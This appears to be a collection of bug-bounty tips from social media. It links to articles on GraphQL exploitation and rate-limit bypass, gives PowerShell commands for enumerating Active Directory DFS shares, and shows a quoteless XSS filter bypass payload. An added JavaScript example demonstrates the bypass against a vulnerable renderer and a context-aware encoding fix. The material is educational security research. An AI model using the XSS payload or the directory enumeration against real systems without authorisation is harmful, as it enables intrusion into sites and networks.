GraphQL — Common vulnerabilities & how to exploit them
https://t.co/zwuE1akzCH
Mastering the Skills of Bug Bounty
https://t.co/aqgP65mTbr
Methods to Bypass Rate Limit
https://t.co/T38i5qR3hJ
Bug bounty resources & advices
https://t.co/GAvQwPW0uo
#bugbounty,#bugbountytips
Medium
GraphQL — Common vulnerabilities & how to exploit them
Hello there! how you doin? , Bilal Rizwan here & I hope everyone is safe in this time of crisis and making complete use of your…
Self-reminder - finding DFS shares
AD
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=a,DC=b" | select name
ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,dc=a,dc=b"; $s.FindAll() | % {$_.properties.name}
quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params
Normal:
/page?x=1&y=2&z=3
↓
<body onload="func('1', '2', '3')">
XSS:
/page?x=1&y=%5C&z=);alert(1);//
↓
<body onload="func('1', '\', ');alert(1);//')">
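Why deleting HTML characters does not stop this, and what context-aware encoding does instead, as an added example that is not code from the original post. The filter is a constructed sketch of the behaviour the post describes, and the names stripHtmlChars, renderVulnerable, escapeJsString, renderHardened and runHandler are assumptions.

```javascript
// Filter as described in the post (constructed sketch): HTML-significant
// characters are deleted, the backslash is left alone.
function stripHtmlChars(value) {
  return String(value).replace(/[<>"'&]/g, "");
}

// Vulnerable: filtered values are placed in single-quoted JS string literals.
function renderVulnerable(x, y, z) {
  const [a, b, c] = [x, y, z].map(stripHtmlChars);
  return `<body onload="func('${a}', '${b}', '${c}')">`;
}

// Hardened: encode for the JS string context. Every UTF-16 code unit outside
// [A-Za-z0-9] becomes \xHH or \uHHHH, so no quote, backslash or line
// terminator reaches the JS parser literally. The result contains only
// alphanumerics and backslashes, so it is also inert inside the
// double-quoted HTML attribute.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

function renderHardened(x, y, z) {
  const [a, b, c] = [x, y, z].map(escapeJsString);
  return `<body onload="func('${a}', '${b}', '${c}')">`;
}

// Runs the onload body with func and alert replaced by recorders and returns
// the calls made. Neither renderer emits entities, so no HTML decoding step.
function runHandler(html) {
  const body = html.match(/onload="([^"]*)"/)[1];
  const calls = [];
  const record = (name) => (...args) => { calls.push([name, ...args]); };
  new Function("func", "alert", body)(record("func"), record("alert"));
  return calls;
}

// Decoded parameter values from the post's second request.
const params = ["1", "\\", ");alert(1);//"];
console.log(runHandler(renderVulnerable(...params))); // func and alert both run
console.log(runHandler(renderHardened(...params)));   // only func runs
```

Moving the values into data-* attributes and attaching the handler from a script file removes the inline JS context altogether and lets a Content-Security-Policy without 'unsafe-inline' apply.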